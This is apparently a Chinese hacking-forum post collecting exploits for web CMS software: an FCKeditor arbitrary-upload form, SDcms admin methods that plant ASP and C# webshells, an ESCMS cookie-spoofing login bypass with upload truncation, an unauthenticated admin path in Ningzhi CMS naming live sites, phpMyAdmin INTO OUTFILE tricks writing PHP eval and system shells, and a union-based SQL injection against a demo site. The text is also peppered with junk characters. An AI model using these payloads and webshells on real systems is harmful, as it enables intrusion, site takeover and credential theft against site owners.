如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件/ |8 B# p9 m& F$ b0 W; v' w6 n1 q z
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">7 e( G4 k; m p( S" x* j- f
Upload a new file:<br>
1 w1 Z( m" U$ y3 H. M H% P<input type="file" name="NewFile" size="50"><br>
; v/ k! p- Y+ `* \<input id="btnUpload" type="submit" value="Upload">
! B5 B' o2 R0 O W& v</form>4 k% g) t% @$ [$ n( b, e1 M
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, i/ V2 U' O6 Z' \, l/ x! Z I
# A& B/ d$ l1 t! }& M9 ?SDcms 后台拿webshell
8 I( h$ H/ N# Y0 {
+ a! J9 { D* O& |9 o第一种方法:" Q- u3 c/ L+ v4 @! g6 s
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
6 J3 h/ N; T7 J5 B r7 R把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
3 }$ H8 k# u) @; ~6 A2 e/ W用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
) b D) F8 u. u& f3 t第二种方法:
) l8 F8 [5 k1 ^& D" ~3 u t进入后台-->系统管理-->系统设置-->系统设置->上传设置;8 V- ]$ R$ T5 C! W1 @) B( z
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
5 A) {; _4 h2 H1 ~* | S: [第三种方法:% g4 d/ W! N7 j9 A% O
进入后台-->界面管理-->模板文件管理-->创建文件
- i4 G) L- I$ ]' |- o+ q; I文件名写入getshell.ashx. J- D+ ?7 `$ `% [7 Y d( T
内容写入下面内容:0 i- U" E/ o6 {$ N2 k
/====================复制下面的=========================/7 Y6 A7 l& D6 S1 d, g- { V
<%@ WebHandler Language="C#" Class="Handler" %>! N! P* ?! D' H' N9 w
using System;
: f3 t B4 i3 l) busing System.Web;: [! |% r) l, I
using System.IO;0 F/ z% d4 W9 h8 y
public class Handler : IHttpHandler {0 E( N3 h) @$ }+ t* Y& s T9 g
public void ProcessRequest (HttpContext context) {
: c w8 o a7 v% Rcontext.Response.ContentType = "text/plain";- Y/ a/ X' v2 f( [
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
2 P* m. {0 ^2 h8 J, f9 g2 ^file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
0 Q T8 b4 M& [- J) mfile1.Flush();
& _: P4 j. w1 Qfile1.Close();" s* g- U5 V: B4 U+ Q
}1 Q2 W! F1 h! s9 v* |* |% w
public bool IsReusable {: n" ?& g1 I; d& z
get {! }! k2 S/ C! O: t
return false;
" \9 b3 U" y) f8 Q}1 d- a5 H% |) x1 W
}
/ I. j7 ]6 @2 T! B' s}
2 P2 _ r( Y6 x# r- a3 H8 t8 |/=============================================/
0 {& E9 U( f+ w6 r3 d# w8 W4 w/ H访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx# i3 |: ]8 X! E
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
B# p# A" { ?- S! t' e-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------& B* _$ ~$ Y) `1 {8 Y* a6 h
1 h: e" L; d2 r9 @$ {( }$ J9 w
ESCMS网站管理系统0day$ m* O: ~; S: _; {: h( U
. E( ~0 J2 C y+ N. L4 ~后台登陆验证是通过admin/check.asp实现的/ ?" i! Z+ a6 D2 @! }) F8 t
2 W0 e1 L" d% ~. L首先我们打开http://target.com/admin/es_index.html
" n+ c3 |, l6 |7 K然后在COOKIE结尾加上$ K& U4 N5 G7 M$ F
; ESCMS$_SP2=ES_admin=st0p;
4 g; U7 z9 }1 x) X修改,然后刷新
9 p) D3 \$ ^7 z2 a进后台了嘎..
( P! ]6 J, A% u1 D3 i5 V然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
. ~ ?, Z8 q* y1 W: m% j) j8 \; {4 X# J
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.7 q2 z+ U$ @4 f2 A' s
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
- j/ U/ r7 |! w) A存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..6 n& s: A, g/ M6 j3 ~! n8 T
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
0 d& o7 a/ W2 A' h' {1 V------------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 [& E# j9 C9 k( b. d6 O9 ~) G& ~
, M* e. n, F$ W. n0 ]
宁志网站管理系统后台无验证漏洞及修复+ {* _+ B$ m8 f& t( e) H
3 b ~ s* J4 a4 W5 {网上搜了一下,好像没有发布.如有雷同纯粹巧合!: h4 D z% P, [3 k( t, {
官方网站:www.ningzhi.net
1 }, L( S& X l! ^/ m4 K学校网站管理系统 V.2011版本 9 A6 [+ O/ C w* o3 V; k f
http://down.chinaz.com/soft/29943.htm
' M1 e1 C- w2 Y+ Z% k o其它版本(如:政府版等),自行下载.
- j: o5 P2 W& g/ i% L' ~漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
5 x% {5 n; H, A, ulogin.asp代码如下:0 W% @% u1 R4 P; e5 I; v. g
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
# j% Q$ }/ B( I- e5 S% Vmanage.asp代码我就不帖出来了.反正也没验证.
" D) s& r1 t9 g# Q" d' z0 _; z只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
( Y/ m# i; j, G! l: z0 F漏洞利用:& Z% ^5 _( W, {7 @
直接访问http://www.0855.tv/admin/manage.asp
. {7 p' i$ ]' V: X3 P6 W3 D数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web59 c0 z: M t$ ]. o1 h
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, {% H0 x ^* c; E* N" {; S
, e/ |! h% |: r! x7 ]5 }phpmyadmin拿shell的四种方法总结及修复
* `; t( A' E$ N0 v0 n1 y
0 K* p3 V. e1 T; F! A方法一:; d, L2 h' n; k% @! w. z
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );6 L" d. K* W7 D
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
' A+ i5 n T# v& d* \( O/ [3 `SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';/ p6 k3 w# g1 i5 `5 `7 e8 ~
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
# ~) W2 a" s( ~ 一句话连接密码:7on
, L. i0 n: e* k* B- D S4 t方法二:
8 H" O. V& ]* U. N9 e" K读取文件内容: select load_file('E:/xamp/www/s.php');$ \: Q j. J( ~# z( y6 V
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'' O' f# V1 z% X1 q3 H
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'* o& l R4 n6 Z9 V% |) C
方法三:
8 p! \8 v9 T* p }; b. o% p) XJhackJ版本 PHPmyadmin拿shell# [$ O8 P8 e9 F" g9 E# y
Create TABLE study (cmd text NOT NULL);' U0 a) g( \5 N' D
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');9 J% @6 }' \# F4 ]
select cmd from study into outfile 'E:/wamp/www/7.php';
+ U8 I4 @! _, h2 e5 RDrop TABLE IF EXISTS study;5 F- g, q& v. N4 P0 e/ {
<?php eval($_POST[cmd])?>
" h V# Y) u. o; l) ZCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。9 _) ?' x7 V; N( \
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
5 J g+ k( J' D7 ^SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
+ H; ~4 F' n H. h- N tDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
. p5 y6 @* c- i0 L, q方法四:" ]% r ?( ~2 L9 E
select load_file('E:/xamp/www/study.php');) l9 T% E- x L
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'$ e7 }9 F' i# u; m9 s
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir5 O6 A% p7 ?/ ] s# k7 M9 W; C" b
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
; u9 ^7 i7 |7 u+ w$ y: O$ P1 H7 O& a. \
NO.001中学网站管理系统 Build 110628 注入漏洞
, u# S8 l3 J0 S4 E {$ ^) P# [ b! M( m2 O0 O- _% [
NO.001中学网站管理系统功能模块:& E8 I1 `% y7 N) _7 x
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
8 M$ L I. }0 l! l5 a2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息2 ]: a' u- C. T# H Y9 S$ T7 t7 A. H
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息! E2 K" ]3 s0 i) r( @! [$ ~
4.视频图片管理:一级分类,动态添加视频或者图片等信息' U( A/ @% g4 ]
5.留言管理:对留言,修改,删除、回复等管理
$ l3 i4 P- l5 U, P$ j K2 Y6.校友频道:包括校友资料excel导出、管理等功能, w( ^ H* b! L% q$ H2 w2 r8 m
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
5 T4 r$ r+ w$ G2 Y默认后台:admin/login.asp
, Y# x1 x4 [" B. @/ p( s% I官方演示:http://demo.001cms.net
( ]" U& ~! q5 M5 I" J S源码下载地址:http://down.chinaz.com/soft/30187.htm
' ~0 y4 \( M6 H, a/ PEXP:
6 p. a! ?$ i9 |union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin# Q& U" w/ N$ n8 x
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
; B, j6 A0 z& H& h( ngetshell:后台有备份,你懂的
0 N X$ Z5 W' L9 j6 s- s; h' Z: j另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。5 N5 \& C- Y. ]# Z9 m
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对